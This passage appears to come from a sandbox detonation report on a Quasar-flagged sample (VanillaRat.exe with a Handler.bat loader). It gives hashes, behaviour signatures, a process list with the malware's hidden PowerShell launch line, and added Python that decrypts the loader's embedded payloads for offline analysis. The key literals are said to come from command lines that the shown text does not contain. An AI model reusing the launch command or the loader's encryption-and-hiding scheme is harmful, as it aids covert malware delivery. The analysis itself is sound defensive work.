| SHA512 | 28c111a484ae656868bf942ef4d5c1079b054814b7f844cfe3dcdc3477cc834865e377421440a81479c25ea96388e736dc0d98fcb3c4e92bf77f541ebe3c836f |
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.de06e259-7074-4cc8-bc62-70e4c22a68fc.tmp.txt
| MD5 | 4a026e04c2b3faa82a8716ab632035b2 |
| SHA1 | 125f8ddb7cbe42b5681ea7c2b10ccf60e0ca8458 |
| SHA256 | c46d1ff5d3c424fa7dccb7a5751fd9f5c230e0fd336a6cc3a5eea4ccc4f08c0b |
| SHA512 | 8e78d984af962f0ea878153af3d2d7796aa5a56d211aecfa15c0eb1f621ac8421228d254e738d4f120f47d6819d4071c8fd8c7a9d0a700e7a58c0aa9ff640a30 |
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.4ec0bf67-f5d0-40c1-b1eb-b0262db871e8.tmp.csv
| MD5 | 5c7d4424c0206de538c84512aff4acb8 |
| SHA1 | 5c999ebbb2c7bb6b6eea1539826c01e97baf0468 |
| SHA256 | 8b345ec2770271ec8174fb48e089144ef182d7e0163009e8930ad2f53bccd35f |
| SHA512 | d3192d582ad59d25646bc686b28db2a18b514179d8c2c970cca8a17f0bc4f72f2536a7a422c48a9769d630808c34f02c75432cfc0bea5682b877396e12adbb4e |
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.15f745ea-299c-4809-9330-d8ecebf4f5da.tmp.txt
| MD5 | 5100664edb873952f210febdc9b061f0 |
| SHA1 | 9ade4234c3e4b4d34d977ba47ce61696e33576eb |
| SHA256 | 9d10ffafefa66265489ffb2bac91b511e60a6344dcb0a60d764617430f663575 |
| SHA512 | d88364d452e8f49bde17107d1c7b3b056e92d2c6398b2aacd5dbe37cca966f21d6d255ceffe4190d509a3fed22b4c81ae048d98d6c09958ab980cd64674bef92 |
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.9abea24d-0d76-4344-bf68-bd1d66a7d33e.tmp.csv
| MD5 | 760f33d64a2005296ec2984480f1998a |
| SHA1 | c1b44ba448a5670a26ee2fac984bf8504b47e9f2 |
| SHA256 | 65b7945fd01e7c92d4eb4a2c1a11e4140dbe4c2db4bb88149e496dd2a8a2aae8 |
| SHA512 | a834b6b10ebc5c72e9bc3e217fd24118b20ede3075f1523cc17ff5fcc6c9c9ffa715e0964c2a32a9dc5a7ee001af2e0c692f45c837f7476ffa7235f59dc21a5c |
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.31f23360-6ef1-4caa-8810-37ca873d5b83.tmp.txt
| MD5 | a3f78579d0e85640326d3842ac9d0b28 |
| SHA1 | f9078ae972ac9b57c4475b604afe2627feb35d85 |
| SHA256 | b872d5239f2fc516d13dda7963f6909490ad7bb67a61dd8e4dd3398d76a2bf12 |
| SHA512 | c1b00ec809afd3a3e7644b0303b92acf102562444c70ec57069b1c743855835aee04fc352f8eaa5ab059e8170541e5288aa13844464d44f174ffee77c6ea4d46 |
memory/552-1457-0x00007FFA62A00000-0x00007FFA634C2000-memory.dmp
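The Handler.bat.exe command line in the behavioral8 process list below shows how the dropped assemblies are carried: the loader reads Handler.bat, takes the first line that starts with SEROXEN, drops those seven characters, splits the rest on backslashes, and for each field runs FromBase64String, AES-CBC decryption with the hard-coded key and IV, then GZip Decompress, before handing the bytes to Assembly.Load and invoking the entry point. The $sxr-powershell.exe stage repeats the same chain with a second key and IV. The Python below is an added example, not code from the report or from the malware, that reimplements that unpacking chain so the embedded assemblies can be recovered offline without ever loading them. The four key/IV constants are the literals from the two command lines; everything else (the fake MZ stubs, the generated Handler.bat text, the helper names) is constructed for this example because the real Handler.bat is not on this page. It needs either the cryptography package or pycryptodome for AES.

```python
"""Offline re-implementation of the Handler.bat.exe unpacking chain:
Base64 -> AES-256-CBC (PKCS7) -> GZip -> PE bytes. Added example; nothing is executed or written."""
import base64
import gzip

try:
    from cryptography.hazmat.backends import default_backend
    from cryptography.hazmat.primitives import padding
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
    _HAVE_CRYPTOGRAPHY = True
except ImportError:  # fall back to pycryptodome if that is what is installed
    from Crypto.Cipher import AES
    from Crypto.Util.Padding import pad, unpad
    _HAVE_CRYPTOGRAPHY = False

# Literals copied from the two loader command lines in this report (32-byte keys, 16-byte IVs).
HANDLER_KEY = base64.b64decode("z1mnkXiSZPv8R2MpZKBD3X42qpFHtc3mYWmVqJ/jqFk=")  # Handler.bat.exe stage
HANDLER_IV = base64.b64decode("oe8taAs+mjon3dfZMtxPIg==")
SXR_KEY = base64.b64decode("2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0=")      # $sxr-powershell.exe stage
SXR_IV = base64.b64decode("dQc6M4a1U8SkygTmibGyDg==")
MARKER = "SEROXEN"  # the loader uses the first line of Handler.bat starting with this, then Substring(7)


def aes_cbc_decrypt(key, iv, data):
    if _HAVE_CRYPTOGRAPHY:
        dec = Cipher(algorithms.AES(key), modes.CBC(iv), backend=default_backend()).decryptor()
        unpadder = padding.PKCS7(128).unpadder()
        return unpadder.update(dec.update(data) + dec.finalize()) + unpadder.finalize()
    return unpad(AES.new(key, AES.MODE_CBC, iv=iv).decrypt(data), 16)


def aes_cbc_encrypt(key, iv, data):
    """Only needed to build the constructed sample below."""
    if _HAVE_CRYPTOGRAPHY:
        padder = padding.PKCS7(128).padder()
        enc = Cipher(algorithms.AES(key), modes.CBC(iv), backend=default_backend()).encryptor()
        return enc.update(padder.update(data) + padder.finalize()) + enc.finalize()
    return AES.new(key, AES.MODE_CBC, iv=iv).encrypt(pad(data, 16))


def unpack_field(b64, key=HANDLER_KEY, iv=HANDLER_IV):
    """One field of the SEROXEN line: FromBase64String -> AES decrypt -> GZip Decompress, as the loader does."""
    return gzip.decompress(aes_cbc_decrypt(key, iv, base64.b64decode(b64)))


def extract_payloads(bat_text, key=HANDLER_KEY, iv=HANDLER_IV):
    """Decoded fields of the first SEROXEN line, in file order (the loader invokes field 1 first, then field 0)."""
    for line in bat_text.splitlines():
        if line.startswith(MARKER):
            return [unpack_field(f, key, iv) for f in line[len(MARKER):].split("\\")]
    raise ValueError("no line starting with %r" % MARKER)


def is_pe(blob):
    """Assembly.Load expects a PE image, so a correctly recovered field starts with the MZ signature."""
    return blob[:2] == b"MZ"


def build_sample_bat(payloads, key=HANDLER_KEY, iv=HANDLER_IV):
    """Constructed input (not the real Handler.bat): pack blobs exactly inversely to unpack_field."""
    fields = [base64.b64encode(aes_cbc_encrypt(key, iv, gzip.compress(p))).decode("ascii") for p in payloads]
    return "@echo off\r\nrem constructed sample\r\n" + MARKER + "\\".join(fields) + "\r\n"


# Two fake PE stubs standing in for the real assemblies; constructed for this example only.
SAMPLE_PAYLOADS = [b"MZ" + b"\x00" * 62 + b"PE\x00\x00stage-0-constructed",
                   b"MZ" + b"\x00" * 62 + b"PE\x00\x00stage-1-constructed"]

if __name__ == "__main__":
    for i, blob in enumerate(extract_payloads(build_sample_bat(SAMPLE_PAYLOADS))):
        print(i, len(blob), "PE" if is_pe(blob) else "not PE")
```

Against a real Handler.bat, call extract_payloads on the file text and write each field that passes is_pe to disk for static analysis; a field that fails the PKCS7 or GZip step was packed with the other stage's material, so retry it with SXR_KEY and SXR_IV before concluding the blob is something else.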
Analysis: behavioral8
Detonation Overview
Submitted
2024-08-18 13:35
Reported
2024-08-18 13:37
Platform
win11-20240802-en
Max time kernel
59s
Max time network
53s
Command Line
Signatures
Quasar RAT
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of NtCreateProcessExOtherParentProcess
| Description | Indicator | Process | Target |
| PID 5292 created 5172 | N/A | C:\Windows\system32\WerFault.exe | C:\Windows\System32\dllhost.exe |
| PID 1180 created 3140 | N/A | C:\Windows\system32\WerFault.exe | C:\Windows\$sxr-powershell.exe |
Suspicious use of NtCreateUserProcessOtherParentProcess
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| N/A | N/A | C:\Windows\$sxr-mshta.exe | N/A |
| N/A | N/A | C:\Windows\$sxr-cmd.exe | N/A |
| N/A | N/A | C:\Windows\$sxr-powershell.exe | N/A |
| N/A | N/A | C:\Windows\$sxr-powershell.exe | N/A |
Indicator Removal: Clear Windows Event Logs
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WER-Diag%4Operational.evtx | C:\Windows\System32\svchost.exe | N/A |
Hide Artifacts: Hidden Window
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\$sxr-powershell.exe | N/A |
| N/A | N/A | C:\Windows\$sxr-powershell.exe | N/A |
Suspicious use of SetThreadContext
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\$sxr-mshta.exe | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| File opened for modification | C:\Windows\$sxr-mshta.exe | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| File created | C:\Windows\$sxr-cmd.exe | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| File opened for modification | C:\Windows\$sxr-cmd.exe | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| File created | C:\Windows\$sxr-powershell.exe | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| File opened for modification | C:\Windows\$sxr-powershell.exe | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\dllhost.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\dllhost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\dllhost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\dllhost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\dllhost.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Windows\$sxr-mshta.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\$sxr-powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\$sxr-powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\$sxr-powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\$sxr-powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\dllhost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\$sxr-powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
C:\Users\Admin\AppData\Local\Temp\Release\VanillaRat.exe
"C:\Users\Admin\AppData\Local\Temp\Release\VanillaRat.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -WindowStyle Hidden -command "& {Start-Process -FilePath 'Handlers\Handler.bat' -WindowStyle Hidden -Wait}
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe
